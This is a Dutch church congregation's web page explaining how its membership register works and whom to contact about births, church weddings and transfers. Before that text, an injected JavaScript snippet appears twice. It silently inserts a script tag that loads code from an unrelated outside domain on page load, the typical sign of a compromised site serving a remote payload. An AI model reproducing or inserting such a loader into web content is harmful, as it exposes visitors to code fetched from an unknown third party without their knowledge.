;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Ledenadministratie - PKN Damwâld
Ledenadministratie

De ledenadministratie van onze kerken  is gekoppeld aan de administratie van de Burgerlijke Stand en wijzigingen worden automatisch in het systeem van de kerk verwerkt. Gaat u dus verhuizen naar een plaats buiten Damwâld (en voor Hervormd ook buiten Broeksterwâld en De Falom)  dan verhuist u ook kerkelijk naar de PKN-gemeente van uw nieuwe woonplaats. Wilt u als Voorkeurslid verbonden blijven aan één van onze kerken dan kunt u  dit schriftelijk  of via e-mail aan de ledenadministratie  doorgeven.

De volgende mutaties worden niet automatisch door de Burgerlijke Stand doorgegeven en deze ook graag schriftelijk of via e-mail aan de ledenadministratie doorgeven:

  • Geboorte
  • Kerkelijke  huwelijksbevestiging

Overschrijven naar een andere gemeente als men niet naar een andere woonplaats verhuist.

Ledenadministratie Gereformeerd DamwâldDhr. M. Admiraal
Ledenadministratie Hervormd Akkerwoude c.a.Mw. T. van der Kooi